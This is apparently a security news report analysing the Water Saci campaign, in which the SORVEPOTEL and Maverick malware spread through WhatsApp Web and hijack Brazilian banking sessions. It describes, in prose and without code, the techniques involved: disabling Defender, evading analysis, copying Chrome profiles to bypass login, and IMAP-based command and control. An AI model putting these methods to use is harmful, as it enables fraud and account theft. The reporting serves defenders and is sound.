11.11.2025
3 min
503
Brazil is facing a new wave of banking attacks: the malware duo SORVEPOTEL and Maverick hijacks WhatsApp Web sessions, blasts an infected ZIP file to all contacts, and then uses the victim’s browser to drain accounts at the country’s biggest banks. Researchers believe the Water Saci campaign is part of the same criminal ecosystem that previously developed the Coyote banking trojan.
The Maverick malware and its companion component SORVEPOTEL target Windows users in Brazil and their online banking sessions. Infection starts with a phishing message on WhatsApp: the victim receives a ZIP archive that contains a Windows shortcut (LNK) file. When opened, the shortcut launches cmd.exe or PowerShell, which reaches out to a remote server (including the domain zapgrande[.]com) to download the first-stage payload and execute a script.
This PowerShell chain disables Microsoft Defender and UAC, then pulls down a .NET loader equipped with anti-analysis tricks. The loader checks for debuggers and reverse-engineering tools and exits if any are found. Once the coast is clear, it downloads the main modules of the attack — SORVEPOTEL and the Maverick banking trojan. Before activating, Maverick verifies the victim is actually located in Brazil by checking the system’s time zone, language, region, and date/time format.
From there, the malware monitors active browser tabs and compares URLs against a hard-coded list of banks and financial services in Latin America. When it sees a match, it contacts its command-and-control (C2) infrastructure to fetch instructions. Maverick can then overlay phishing pages on top of real banking sites, harvest credentials, capture screenshots, list running processes and files, execute arbitrary CMD or PowerShell commands, and generally take full remote control of the machine (download, upload, delete, rename, move files, reboot or shut down the system, and update itself).
Water Saci’s signature move is aggressive self-propagation through WhatsApp Web. The scripts download ChromeDriver and Selenium, copy the victim’s real Chrome profile — cookies, auth tokens, and session data included — into a temporary workspace, and use it to log into WhatsApp Web without QR-code scanning. SORVEPOTEL then automatically sends the same malicious ZIP file to every harvested contact, while displaying a fake “WhatsApp Automation v6.0” banner to disguise the mass-messaging behavior.
Another notable quirk is its non-standard C2 setup. Instead of classic HTTP callbacks, part of the command channel works over IMAP access to terra.com[.]br mailboxes using hard-coded credentials. The backdoor checks the attacker-controlled inbox for new messages that contain C2 URLs and tasking. Some of these accounts are protected with MFA, which slows operations but also makes the infrastructure harder to take down. Vendors note that Water Saci effectively runs a remote operations center: operators can pause/resume the campaign, monitor the spread in real time, and leverage infected hosts as a coordinated botnet.
The Coyote banking trojan was first reported earlier: it was written in .NET, focused on Brazilian users and banks, and specialized in intercepting browser sessions. Later analysis by several vendors (including Trend Micro, Kaspersky and CyberProof) found major code overlaps between Maverick and Coyote, similar targeting, and the same reliance on WhatsApp as a primary delivery vector — strong signals that they belong to one Brazilian cybercriminal ecosystem. At the same time, researchers stress that Maverick should be treated as a distinct evolution: instead of relying on traditional droppers, it pivots to stealing real browser profiles and abusing mainstream messaging platforms for stealthy, large-scale propagation.
The Water Saci campaign shows that modern banking trojans look more like full-blown offensive platforms than simple keyloggers. Threat actors are moving away from obvious EXE payloads toward VBS/PowerShell scripts that steal browser profiles, bypass normal login flows in messaging apps, and build distributed botnets on top of everyday consumer services. In regions where WhatsApp is the default communication channel, this means that any ZIP archive from a trusted contact can be the entry point to a major financial compromise.
